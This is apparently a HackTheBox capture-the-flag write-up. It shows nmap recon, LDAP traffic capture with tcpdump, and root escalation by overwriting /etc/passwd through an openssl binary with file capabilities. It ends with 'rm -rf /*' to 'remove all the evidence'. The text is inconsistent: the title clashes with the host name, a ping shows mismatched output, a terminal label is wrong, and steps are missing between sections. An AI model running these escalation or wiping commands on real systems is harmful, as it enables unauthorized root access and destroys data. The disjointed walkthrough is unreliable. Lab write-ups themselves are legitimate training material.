Explore is an medium-rated Linux machine from HackTheBox created by 0xEA31. In the current post, my IP is 10.10.14.32, and the target IP is 10.129.95.236.
I liked this machine a lot, more than just researching to find a specific CVE or something like that. In the beginning, the machine is open; you can get in without effort and then use various techniques to pivot between many users. It's a good LDAP practice.
Recon
First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
$ ping -c 1 10.129.95.236
Pinging 10.129.95.236 with 32 bytes of data:
Reply from 10.129.95.236: bytes=32 time=144ms TTL=63
Reply from 10.129.95.236: bytes=32 time=148ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Ping statistics for 10.129.95.236:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 142ms, Maximum = 148ms, Average = 144ms
By the TTL, we assume that is a Linux Machine (value around 64)
-p- --open to scan all open port
-T5 Scan at max speed, a little bit noisy
-v verbose, return more information while scanning
-n Scan don’t apply DNS resolution, more speed.
Local Terminal
$ nmap -p- --open -T5 -v -n 10.129.95.236 -oG Ports
Completed SYN Stealth Scan at 09:30, 258.48s elapsed (65535 total ports)
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
Not shown: 65273 filtered tcp ports (no-response), 259 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 259.02 seconds
Raw packets sent: 131004 (5.764MB) | Rcvd: 301 (20.480KB)
-sC Basic Nmap scripts.
-sV Return versions of the services.
Local Terminal
$ nmap -sCV -p 22,80,389 10.129.95.236 -oN Target
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 09:32 Pacific SA Standard Time
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
Important information: {Domain : lightweight.htb}, modify your host file to add that domain to the target IP.
So, we will be blocked if we try brute force, this apply to dictionary attacks too. At this point, we have to explore the website through view:source (CTRL+U).
At the source code, there is a js/index.js, is always a good idea to check with the browser, in case of Directory Listing.
That is an interesting statement, we can login using SSH with our IP address as username and password.
By hovering, we can find that there is a new url, http://10.129.95.236/reset.php, it says that is just for reset our username and password, so nothing to worry about.
But first, LDAP Enumeration
LDAP Enumeration
If we use at the terminal locate .nse we will enumerate every nmap script, but here the goal it's to execute every LDAP related script, we can add a filter by using locate .nse | grep ldap
by checking capabilities, we found TCPdump, and that is interesting to play with specially because we can execute an account reset at reset.php to trigger an interaction with us.
Target Terminal [10.10.14.32]
$ cd /tmp/
$ tcpdump -i any -w Capture.cap -v # Just a test, you can try "which tcpdump" too
$ rm Capture.cap
-i any Any Interface
-w Save the output as:
-v Verbose
It was just a test, now the best option is to open a new local terminal or Wireshark to scan a TCPDump sent by the target.
Target Terminal [10.10.14.32]
$ tcpdump -i lo port 389 -w capture.cap -v
Now play at the website, navigate everywhere, press all the buttons, and the most important thing, execute the reset.php command.
You have to download the capture.cap file and explore the content with Wireshark
[ldapuser1@lightweight ~]$ id
uid=1000(ldapuser1) gid=1000(ldapuser1) groups=1000(ldapuser1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[ldapuser1@lightweight ~]$ sudo -l
[sudo] password for ldapuser1:
Sorry, user ldapuser1 may not run sudo on lightweight.
[ldapuser1@lightweight ~]$ getcap -r *
openssl =ep
tcpdump = cap_net_admin,cap_net_raw+ep
$ cd ~
$ cp /etc/passwd passwd
$ openssl passwd # Here I used 'hello' as password
Password: #hello
Verifying - Password: # hello
z4oRRkp3WBrCc # Save this
Local Terminal
$ hashid z4oRRkp3WBrCc
Analyzing 'z4oRRkp3WBrCc'
[+] DES(Unix)
[+] Traditional DES
[+] DEScrypt
Target Terminal [ldapuser1]
$ nano passwd
Replace the "X" with "z4oRRkp3WBrCc"
With this, the machine will not extract the password from /etc/shadow and decrypt with SHA512 {Check with at TargetSSH: grep "ENCRYPT_METHOD" /etc/login.defs}, and just read it from passwd… with the capability in the Openssl, we will replace the password file.
Target Terminal [ldapuser1]
$ cat passwd | ./openssl enc -out /etc/passwd
# No message, it works.
$ cat /etc/passwd
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
<...>
$ su root #using hello as password
Target Terminal [root]
$ cd /root
$ cat /root/root.txt
$ rm -rf /* # To remove all the evidence
